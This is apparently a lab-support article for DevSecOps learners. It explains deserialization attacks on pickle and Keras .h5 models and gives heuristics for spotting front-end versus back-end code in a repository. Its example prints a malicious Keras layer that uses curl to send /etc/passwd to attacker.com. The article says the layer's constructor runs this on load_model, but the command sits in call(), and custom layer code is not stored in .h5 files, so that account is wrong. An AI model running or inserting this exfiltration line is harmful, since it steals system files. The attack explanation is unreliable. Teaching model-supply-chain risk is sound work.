Home Technical Support Advanced Lab Topics: Model Attacks & How to Identify Front‑End vs. Back‑End Code in a Repository

Advanced Lab Topics: Model Attacks & How to Identify Front‑End vs. Back‑End Code in a Repository

Last updated on Jan 07, 2026

Advanced Lab Topics: Model Attacks & How to Identify Front‑End vs. Back‑End Code in a Repository

In this article we dive deep into two frequent pain points that learners encounter while working through DevSecOps labs:

  1. Understanding why a trojan‑injected neural‑network model looks different from a classic pickle‑based model
  2. Determining whether a given source‑code repository contains front‑end, back‑end, or full‑stack components

Both topics are essential for mastering secure model deployment and for communicating effectively with DevOps teams. Let’s explore the concepts, practical steps, and common questions you’ll face on the job.

1. Trojanized Models – What Really Changes?

1.1 The Core Attack Vector Remains the Same

Regardless of the model’s format, the underlying vulnerability is pickle‑based code execution. An attacker can embed malicious Python objects that execute arbitrary commands when the model is unpickled (or otherwise deserialized).

Aspect Classic Pickle Model Neural‑Network (.h5) Model
File type .pkl (binary pickle) .h5 (HDF5 container)
Framework Pure Python / scikit‑learn TensorFlow / Keras
Storage format Serialized Python objects HDF5 dataset with layers, weights, and optional custom objects
Attack technique Inject malicious __reduce__ payload into pickle Embed malicious custom layer or callback that is executed during model loading (load_model)
Security risk Same – arbitrary code execution on deserialization Same – code runs when the model is loaded with tf.keras.models.load_model()

Bottom line: The type of model (pickle vs. neural network) changes only the file format and loading API. The risk—code execution during deserialization—remains identical.

1.2 Why the .h5 Example Matters

In production environments, many teams store Keras/TensorFlow models as .h5 files because HDF5 is compact, version‑agnostic, and easy to serve with model‑hosting platforms. Demonstrating the attack on a .h5 model shows learners how the same exploit can slip through a “real‑world” pipeline that looks perfectly legitimate.

Practical Example

# Malicious custom layer that runs a shell command
class EvilLayer(tf.keras.layers.Layer):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def call(self, inputs):
        import os
        os.system('curl http://attacker.com/steal?data=$(cat /etc/passwd)')
        return inputs

# Save the compromised model
model = tf.keras.Sequential([tf.keras.layers.Dense(10), EvilLayer()])
model.save('compromised_model.h5')

When a downstream service runs tf.keras.models.load_model('compromised_model.h5'), the EvilLayer constructor executes, delivering the same impact as a malicious pickle.

2. Determining Front‑End vs. Back‑End Code in a Repository

2.1 Start with Language‑Based Heuristics

Language / Framework Typical Layer Typical File Extensions
Python, Java, Go, .NET, Ruby on Rails Back‑end (API, services, DB logic) .py, .java, .go, .cs, .rb
JavaScript (TypeScript, CoffeeScript) Front‑end UI code .js, .ts, .coffee
Angular, Vue.js, React Front‑end SPA frameworks .html, .vue, .jsx, .tsx
Node.js Can be both (API + server‑side rendering) .js, .ts
HTML / CSS / SCSS Pure front‑end assets .html, .css, .scss

If you spot a mix of the above, the repository is likely full‑stack.

2.2 Examine Project Structure

  1. Look for conventional directories
    • src/main/java or app/ → back‑end
    • src/frontend, public/, static/, client/ → front‑end
  2. Check build / dependency files
    • package.json, webpack.config.js, vite.config.ts → front‑end tooling
    • pom.xml, build.gradle, requirements.txt → back‑end or shared services
  3. Identify Dockerfiles / CI scripts
    • A Dockerfile that installs nginx and copies dist/ usually serves a front‑end bundle.
    • A Dockerfile that runs gunicorn, java -jar, or dotnet run indicates back‑end services.

2.3 Microservices vs. Monoliths

Architecture Likely Code Mix
Microservices (each repo = one service) Usually back‑end only (API, DB access)
Full‑stack application (single repo) Contains both front‑end UI and back‑end API layers

If you’re dealing with a microservice, ask: “Does this service expose HTTP endpoints only, or does it also bundle a UI?” The answer often lies in the presence of static asset folders (/static, /public) or a frontend/ sub‑module.

2.4 Collaboration Is Key

Even with the best heuristics, you may need to:

  • Ask the repository owner for a quick overview.
  • Review the README – many teams document the stack explicitly.
  • Pair‑program with a teammate to walk through the folder layout.

3. Tips & Best Practices

  • Automate detection: Write a simple script that scans for language‑specific file extensions and reports a front‑end/back‑end ratio.
  • Use static analysis tools (e.g., cloc, sonarqube) to get a language breakdown.
  • Validate model sources: Never load a model from an untrusted location without sandboxing or integrity checks (hash verification, signed artifacts).
  • Document your findings: Add a CODEBASE.md file describing the layers present; this helps future security reviews.

4. Common Questions

Question Answer
Is the neural‑network attack more dangerous than the pickle attack? No. Both allow arbitrary code execution; the difference is only the file format and loading library.
What if a repository contains only JavaScript files? It could be a front‑end SPA, a Node.js back‑end, or a full‑stack project. Look at the package.json scripts (start, build) and any server‑side frameworks (Express, NestJS).
Can I rely on file extensions alone? Not entirely. Some projects use compiled assets (.js generated from TypeScript) or embed back‑end code in unconventional files. Combine extension checks with directory conventions and build configs.
How do I safely load a potentially compromised model? Use a restricted execution environment (Docker container with limited privileges), verify a digital signature, or load the model in a sandboxed interpreter that disables os.system‑like calls.

Takeaway

Understanding the underlying security principle (code execution on deserialization) lets you spot model‑related threats regardless of file type. Simultaneously, mastering language‑based heuristics and project‑structure clues equips you to quickly identify the front‑end/back‑end composition of any repository—an essential skill when collaborating with DevOps and development teams. Use the guidelines above to audit labs confidently, communicate findings clearly, and keep your pipelines secure.